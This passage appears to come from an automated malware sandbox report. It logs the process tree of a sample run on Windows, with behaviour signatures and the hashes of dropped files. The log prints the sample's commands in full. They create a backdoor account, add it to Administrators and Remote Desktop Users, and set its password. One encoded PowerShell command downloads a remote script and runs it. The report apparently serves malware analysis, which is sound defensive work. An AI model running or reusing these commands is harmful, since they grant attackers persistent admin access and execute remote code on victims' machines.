    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc 8oTGm0XS
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc 8oTGm0XS
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 8oTGm0XS
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        signatures: Blacklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C net user wgautilacc 1234
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc 1234
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 1234
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES3FDE.tmpMD5
0375914593b948a36e267f39b56c6f2e
SHA14e5bd2b6d550a21d5b4b770617084492b4d185c2
SHA256b07d87250b79e8ece6d2bad60c129cffa6c79eadb2d4915976ab8f537894c059
SHA5124377d6369c67baa0bb05be84119f4c5f22888beea09ae669d2ca1c8b9c669ea7d8186d7c32922f75d74b8db8c81a7ef4bd8a544640ab0d169217d89f086b729c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
bcac3bbb18f093dbc8e5e76d2675695f
SHA196453f65b41e428937349e6f48fe67d6dfd6a580
SHA256b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a